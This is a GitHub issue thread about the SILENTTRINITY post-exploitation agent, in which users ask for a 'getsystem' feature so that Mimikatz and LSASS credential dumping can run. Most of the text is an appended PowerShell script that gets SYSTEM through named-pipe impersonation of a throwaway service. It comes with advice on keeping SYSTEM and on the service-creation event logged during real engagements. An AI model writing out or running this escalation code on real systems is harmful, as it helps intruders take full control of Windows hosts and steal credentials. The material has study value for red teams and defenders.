byt3bl33d3r / SILENTTRINITY

An asynchronous, collaborative post-exploitation agent powered by Python and .NET's DLR
GNU General Public License v3.0

Automatically attempt to elevate permissions or add Get SYSTEM module #65

Closed (kildonan5 closed this issue 4 years ago)

kildonan5 commented 5 years ago

Context

ST Setup & resulting behavior

HTTPS listener on port 8080
MSBuild stager executed on a Windows Server 2016 client, under the context of a domain user in the local Administrators group
Module = ipy/mimikatz, run all

Output:

[+] f83a38c9-14fe-44ad-870f-2d70fc3e24e7 returned job result (id: LJpKMPve)
[-] Not in high integrity process

Expected Behavior

ST should attempt to elevate privileges to SYSTEM before running the Mimikatz and/or any LSASS-related modules. Alternatively, create a separate module (such as MSF's getsystem) which would achieve this purpose.

Current Behavior

Even if the session is running under the context of a user in the Administrators group, LSASS modules fail to execute (dump memory).

b4cktr4ck2 commented 5 years ago

Definitely would love to see an elevation of privilege module (via Process Injection, Token Impersonation, etc).

If there's any way I can assist I'd love to help out (testing, writing/porting the modules from Meterpreter)

byt3bl33d3r commented 4 years ago

This was added in the newest update. Some changes are going to be needed to make it a bit more streamlined but the code is there. Cheers

kildonan5 commented 4 years ago

When you say this was added, do you mean a getsystem module/feature? I have not had a chance to test it again (I'm having trouble installing the dependencies), but I watched your webinar, and when it came to dumping creds (minidump module), you got the error "not in a high integrity process".

At that point you said you 'cheated' and started the boo/winrm lateral movement module (to launch a stager on a separate machine that was already in a high integrity process?).

How do you move to a high integrity process (getsystem essentially) when you are not in a high integrity process (but the user is a local administrator)?
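The question the thread ends on comes down to a Windows detail, and the example below (added here; it is not SILENTTRINITY code, and its function and parameter names Get-IntegrityLevel, Test-AdministratorsMember, Invoke-PipeGetSystem and -Action are its own) shows both sides of it in PowerShell. Under UAC, a member of the local Administrators group normally runs at Medium integrity with a filtered token: the Administrators group is present but marked deny-only, and SeImpersonatePrivilege and the right to create services are absent. The classic getsystem techniques (named-pipe impersonation, token duplication from a SYSTEM process) need one of those, so "admin but not high integrity" is exactly the state in which they fail; you first need a process that is already elevated (a UAC bypass, or a stager started from an elevated shell). Once in a high-integrity process, SYSTEM is one service away: the script creates a throwaway service whose binary is cmd.exe writing into a named pipe the script is listening on, then impersonates the pipe's client, which the Service Control Manager runs as LocalSystem.

```powershell
# Added example, not SILENTTRINITY's own code. Demonstrates the two halves of
# "getsystem" from an admin account: (1) check the integrity level of the current
# process, (2) if it is High, impersonate SYSTEM through a named pipe whose client
# is a throwaway service (the same idea as Meterpreter's getsystem technique 1).
# Assumptions: Windows PowerShell 5.1 or later, sc.exe on PATH, and the function
# and parameter names (Get-IntegrityLevel, Invoke-PipeGetSystem, -Action) are
# this example's own.

function Get-IntegrityLevel {
    # whoami reports the token's mandatory label as a pseudo-group, for example
    # "Mandatory Label\High Mandatory Level". WindowsIdentity.Groups omits the
    # label SID (S-1-16-*), so whoami is the simplest reliable source.
    $row = whoami /groups /fo csv | ConvertFrom-Csv |
        Where-Object { $_.'Group Name' -like 'Mandatory Label\*' } |
        Select-Object -First 1
    if (-not $row) { return 'Unknown' }
    return ($row.'Group Name' -replace '^Mandatory Label\\', '') -replace ' Mandatory Level$', ''
}

function Test-AdministratorsMember {
    # True if BUILTIN\Administrators (S-1-5-32-544) is in the token at all,
    # including the "deny only" form a UAC-filtered (Medium) token carries.
    $row = whoami /groups /fo csv | ConvertFrom-Csv | Where-Object { $_.SID -eq 'S-1-5-32-544' }
    return [bool]$row
}

function Invoke-PipeGetSystem {
    param([Parameter(Mandatory)][scriptblock]$Action)

    $level = Get-IntegrityLevel
    if ($level -notin @('High', 'System')) {
        # A local admin under UAC runs at Medium with a filtered token: no
        # SeImpersonatePrivilege and no right to create services, so this
        # technique cannot work here. An elevated process is needed first
        # (a UAC bypass, or a stager launched from an already-elevated process).
        $member = if (Test-AdministratorsMember) { 'is' } else { 'is not' }
        throw "Not in a high integrity process (level $level; account $member a member of Administrators)"
    }

    $pipeName = 'st_' + [guid]::NewGuid().ToString('N').Substring(0, 8)
    $svcName  = "svc_$pipeName"
    $server   = [System.IO.Pipes.NamedPipeServerStream]::new(
        $pipeName, [System.IO.Pipes.PipeDirection]::InOut, 1,
        [System.IO.Pipes.PipeTransmissionMode]::Byte, [System.IO.Pipes.PipeOptions]::None)
    $output   = [System.Collections.ArrayList]::new()

    try {
        # Listen before the client exists. The SCM runs the service binary as
        # LocalSystem, so the cmd.exe that writes into our pipe connects as SYSTEM.
        # sc start blocks until the SCM gives up on a binary that never calls
        # StartServiceCtrlDispatcher, so accept the connection asynchronously.
        $connect = $server.WaitForConnectionAsync()
        sc.exe create $svcName binPath= "cmd.exe /c echo getsystem > \\.\pipe\$pipeName" | Out-Null
        sc.exe start $svcName 2>&1 | Out-Null    # error 1053 is expected; the payload already ran
        if (-not $connect.Wait(15000)) { throw "No client connected to \\.\pipe\$pipeName" }

        # ImpersonateNamedPipeClient needs at least one byte read from the client first.
        $null = $server.ReadByte()

        # RunAsClient impersonates the pipe client on the calling thread for the
        # duration of the delegate and reverts when it returns.
        $server.RunAsClient([System.IO.Pipes.PipeStreamImpersonationWorker]{
            [void]$output.Add((& $Action))
        })
        return $output[0]
    }
    finally {
        $server.Dispose()
        sc.exe delete $svcName | Out-Null
    }
}

# Usage: run the block under the impersonated token and report who we were while it ran.
Invoke-PipeGetSystem -Action { [Security.Principal.WindowsIdentity]::GetCurrent().Name }
```

Impersonation from RunAsClient is thread-scoped and ends when the delegate returns, so any LSASS work has to happen inside the -Action block; a child process started there receives the primary token, not the impersonated one. Holding SYSTEM beyond the block means duplicating the impersonation token (OpenThreadToken, DuplicateTokenEx) and starting a process with it, which is the token-duplication route b4cktr4ck2 mentions and is not shown here. Creating and deleting a service is also noisy: the System event log records every new service as event 7045, which matters on a real engagement.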